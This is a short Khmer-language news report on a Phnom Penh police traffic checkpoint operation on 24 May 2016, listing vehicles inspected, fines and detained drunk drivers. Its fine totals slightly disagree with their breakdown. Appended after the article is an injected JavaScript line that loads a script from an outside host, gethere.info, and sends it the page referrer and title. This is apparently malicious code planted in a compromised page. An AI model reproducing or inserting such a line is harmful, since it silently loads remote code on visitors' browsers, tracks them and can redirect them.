លទ្ធផលនៃការចុះត្រួតពិនិត្យនិងរិតបន្តឹងច្បាប់ចរាចរណ៍ថ្ងៃទី២៤យប់មិុញ
ភ្នំពេញ៖ក្រោមឥទ្ធពលនៃជាតិស្រវឹងមនុស្សចំនួន០២នាក់ ត្រូវបានសមត្ថកិច្ចឃាត់ខ្លួន ខណ:ឆ្លងកាត់គោលដៅត្រួតពិនិត្យរិតបន្តឹងច្បាប់ចរាចរណ៍ផ្លូវគោកនាយប់ថ្ងៃទី ២៤ ខែឧសភា ខែឆ្នាំ២០១៦យប់មិុញនេះ ដោយសមត្ថកិច្ច ទូទាំងរាជធានីភ្នំពេញបានចុះអនុវត្តន៍តាមគោលដៅ ចាប់ពីវេលាម៉ោង៩យប់ រហូតដល់ម៉ោង៣ទាបភ្លឺ ជាលទ្ធផលសមត្ថកិច្ចបានធ្វើការត្រួតពនិត្យយានយន្តផងដែរ មានចំនួន ១៩៨គ្រឿង ក្នុងនោះម៉ូតូមានចំនួន១៣៥គ្រឿង រីឯ រថយន្តមានចំនួន៦៣គ្រឿង។
ក្នុងនោះផងដែរចំពោះយានយន្តដែលបានចេញប័ណ្ណពិន័យបទល្មើស ចំនួន៣១គ្រឿង ដែលមានម៉ូតូចំនួន២៥គ្រឿងនិងរថយន្ត៧គ្រឿង។
នៅក្នុងនោះផងដែរសមត្ថកិច្ចយើងបាន ពិន័យទៅលើអ្នកបើកបរម៉ូតូចំនួន០២នាក់ដែលមានអត្រាជាតិស្រវឹងចាប់ពី០,២៥ ដល់០,៣៩ មីលីក្រាម។
ដោយឡែកសមត្ថកិច្ចបានឃាត់ខ្លួនអ្នកបើកបរស្រវឹងលើសកំរិតចំនួន២នាក់ ទៅលើអ្នកបើកម៉ូតូដែលពួកគាត់មាន អត្រាជាតិអាល់កុលពី ០,៦៣ ដល់ ១ ,១៦មីលីក្រាមក្នុងមួយលីត្រខ្យល់។
រយ:ពេល៨៦លើកនេះបានឃាត់អ្នកបើកបរយានយន្តចំនួន៣៩៨នាក់ ដែលក្នុងនោះមានអ្នកបើកបររថយន្តចំនួន៩៥នាក់ដែលមានស្ត្រី០៣នាក់នៅក្នុងនោះ រីឯតួរលេខអ្នកបើកបរម៉ូតូមានចំនួន៣០៣នាក់។
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;